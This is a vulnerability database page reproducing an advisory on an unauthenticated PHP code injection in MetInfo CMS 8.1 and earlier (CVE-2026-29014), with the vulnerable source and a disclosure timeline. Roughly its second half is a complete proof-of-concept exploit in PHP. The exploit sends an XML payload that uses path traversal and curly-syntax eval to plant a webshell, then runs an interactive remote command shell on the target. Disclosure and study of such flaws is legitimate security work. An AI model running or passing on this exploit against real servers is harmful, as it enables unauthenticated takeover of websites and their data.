Vulners
Lucene search
📄 MetInfo CMS 8.1 Code Injection
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2026-29014 | 1 Apr 202615:26 | – | circl |
 | MetInfo CMS 安全漏洞 | 1 Apr 202600:00 | – | cnnvd |
 | CVE-2026-29014 | 1 Apr 202612:22 | – | cve |
 | CVE-2026-29014 MetInfo CMS Unauthenticated PHP Code Injection RCE | 1 Apr 202612:22 | – | cvelist |
 | EUVD-2026-17875 | 1 Apr 202615:31 | – | euvd |
 | MetInfo CMS <= 8.1 - Remote Code Execution | 4 Jun 202603:48 | – | nuclei |
 | CVE-2026-29014 | 1 Apr 202613:16 | – | nvd |
 | 📄 MetInfo CMS 8.1 Shell Upload Mass Exploiter | 24 Apr 202600:00 | – | packetstorm |
| 📄 MetInfo CMS 8.1 PHP Code Injection | 24 Apr 202600:00 | – | packetstorm |
 | MetInfo CMS 8.1 WeChat Module Vulnerability Detection Scanner | 24 Apr 202600:00 | – | packetstormnews |
10
---------------------------------------------------------------------------
MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
---------------------------------------------------------------------------
[-] Software Link:
https://www.metinfo.cn
[-] Affected Versions:
Versions 7.9, 8.0, and 8.1.
[-] Vulnerability Description:
The vulnerable code is located into the
/app/system/weixin/include/class/weixinreply.class.php script.
Specifically, within the weixinreply::wxAdminLogin() method:
149. public function wxAdminLogin($data = array(),$code = '')
150. {
151. global $_M;
152. $weixinapi = load::mod_class('weixin/weixinapi','new');
153. $login_code = cache::get("weixin/".$code);
154. if ($login_code) {
155. cache::put("weixin/".$login_code,$data['FromUserName']);
156. }
157. return;
158. }
User input passed through the "EventKey" and "FromUserName" XML tags
from the HTTP request body when dispatching weixin API requests is not
properly sanitized before being used in a call to the cache::get() and
cache::put() methods respectively.
Specifically, the $code parameter may include Path Traversal
sequences, making the cache::get() method into including arbitrary PHP
files. This can be abused to set the $login_code variable to the
"Array" string by including an arbitrary cache file. Subsequently, the
cache::put() method will write the "FromUserName" parameter into the
/cache/weixin/Array.php file, embedding it within double quotes:
30. public static function put($file, $data, $type = 'php')
31. {
32. global $_M;
33.
34. load::sys_func('file');
35. $save = PATH_CACHE . $file . '.' . $type;
36. makefile($save);
37. #$data = str_replace(array("\"", "\\"), array("\\\"",
"\\\\"), $data);
38. if (!is_array($data)) {
39. file_put_contents($save, "<?php\ndefined('IN_MET') or
exit('No permission');\n\$cache=\"{$data}\";\n?>");
40. } else {
41. $info = var_export($data, true);
42. $info = "<?php\ndefined('IN_MET') or exit('No
permission');\n\$cache = {$info};\n?>";
43. file_put_contents($save, $info);
44. }
45. }
This can be exploited by remote, unauthenticated attackers to inject
and execute arbitrary PHP code by abusing PHP's complex curly syntax,
leading to unauthenticated Remote Code Execution (RCE).
NOTE: when MetInfo is running on non-Windows servers, successful
exploitation of this vulnerability requires the /cache/weixin/
directory to exist, which is created when installing and configuring
the official WeChat plugin.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-29014.php
[-] Solution:
No official solution is currently available.
[-] Disclosure Timeline:
[26/02/2026] - Vendor contacted through several @metinfo.cn and
@mituo.cn email addresses, no response
[07/03/2026] - Tried to reach out to the vendor again, no response
[28/03/2026] - Tried to reach out to the vendor once again, no response
[29/03/2026] - Tried to reach out to the vendor through Weibo, no response
[30/03/2026] - CVE identifier requested
[31/03/2026] - CVE identifier assigned
[01/04/2026] - Public disclosure
[-] CVE Reference:
CVE-2026-29014 has been assigned to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-06
--- packet storm attached poc below: ---
<?php
/*
---------------------------------------------------------------------------
MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.metinfo.cn
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-06
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+----------------------------------------------------------+";
print "\n| MetInfo CMS <= 8.1 Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2) die("\nUsage: php {$argv[0]} <URL>\n\n");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}app/system/entrance.php?n=include&m=module&c=weixin&a=doapi");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
print "\n[+] Injecting PHP webshell\n";
$payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>';
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
if (!preg_match("/success/", curl_exec($ch))) die("[-] Injection failed!\n\n");
print "[+] Launching webshell\n";
$phpcode = "chdir('../..'); print '_____'; passthru(base64_decode('%s')); print '_____';";
$payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&Array</EventKey></x>';
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
while(1)
{
print "\nmetinfo-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 49.3
CVSS 3.19.8
EPSS0.31224
SSVC